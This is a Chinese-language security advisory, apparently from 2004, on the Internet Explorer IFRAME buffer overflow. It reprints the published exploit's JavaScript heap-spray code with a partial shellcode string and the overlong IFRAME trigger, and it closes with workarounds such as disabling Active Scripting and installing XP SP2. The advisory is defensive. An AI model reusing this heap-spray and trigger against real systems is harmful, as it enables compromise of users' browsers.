网路攻击关键报告 - IE Iframe 弱点之攻击码解析与防范

2004/11/05 美国电脑紧急事故处理小组（CERT）发出 IE Iframe 与 Frame 弱点警告美国各级相关单位，严防有心人士利用这个弱点，让网路威胁再升级· 最近新窜起的 MyDoom 新型蠕虫，就是针对 IE Iframe 这个弱点，发动全面围剿，让 IE 使用者不得安宁· DragonSoft 弱点稽核小组，提出这个弱点的原理分析与暂时降低风险解决方案，让使用者降低威胁风险，度过这个关键期:

IE Iframe Buffer Overflow 分析:

Iframe 弱点解析
IE Iframe 和 Frame 都是 HTML 框架标记的一种使用语法，这个 Iframe(Frame)问题存在签属 SRC 与 Name 时缓冲区缺乏适当验证，而导致缓冲区溢位(Buffer Overflow).

    The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.

Iframe 弱点攻击解析

(1) 利用 script Shell 程式码

<SCRIPT language="javascript">
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u01
78%u52ea%u89eb");
// Nopslide will contain these bytes: bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.  
slackspace = headersize+shellcode.length  
while (bigblock.length<slackspace) bigblock+=bigblock;  
fillblock = bigblock.substring(0, slackspace);  
block = bigblock.substring(0, bigblock.length-slackspace);  
while(block.length+slackspace<0x40000) block = block+block+fillblock;  
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>

(2) 在 Iframe SRC=file: 夹带超长字串

<IFRAME SRC=file://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA........NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCC............??">
</IFRAME>

IE 安全防护机制:
DragonSoft 弱点稽核小组建议使用者,在修补程式尚未更新时,可采取下列安全设定来提高自身的安全性:

Windows 2000 IE 用户:
(1)选择【网际网路选项\安全性】关闭【Active Scripting】.
(2)选择【网际网路选项\近端内部网路】关闭【ActiveX】.
Windows XP IE 用户:

方法一
(1)安装 XP Service Pack 2 修补(此版本不受这个弱点影响).

方法二
(1)选择【网际网路选项\安全性】关闭【Active Scripting】.
(2)选择【网际网路选项\近端内部网路】关闭【ActiveX】.

ps.关闭 Active 功能,相关需要 Active 支援的功能,将可能无法正常运作,建议使用者参考 Microsoft 公告.

相关连结:

Microsoft Internet Explorer IFRAME 缓冲区溢位弱点
http://vdb.dragonsoft.com.tw/detail.php?id=2078
US-CERT Vulnerability Note VU#842160
http://www.kb.cert.org/vuls/id/842160
US-CERT Technical Cyber Security Alert TA04-315A
http://www.us-cert.gov/cas/techalerts/TA04-315A.html

网路攻击关键报告 - IE Iframe 弱点之攻击码 解析与防范

网路攻击关键报告 - IE Iframe 弱点之攻击码解析与防范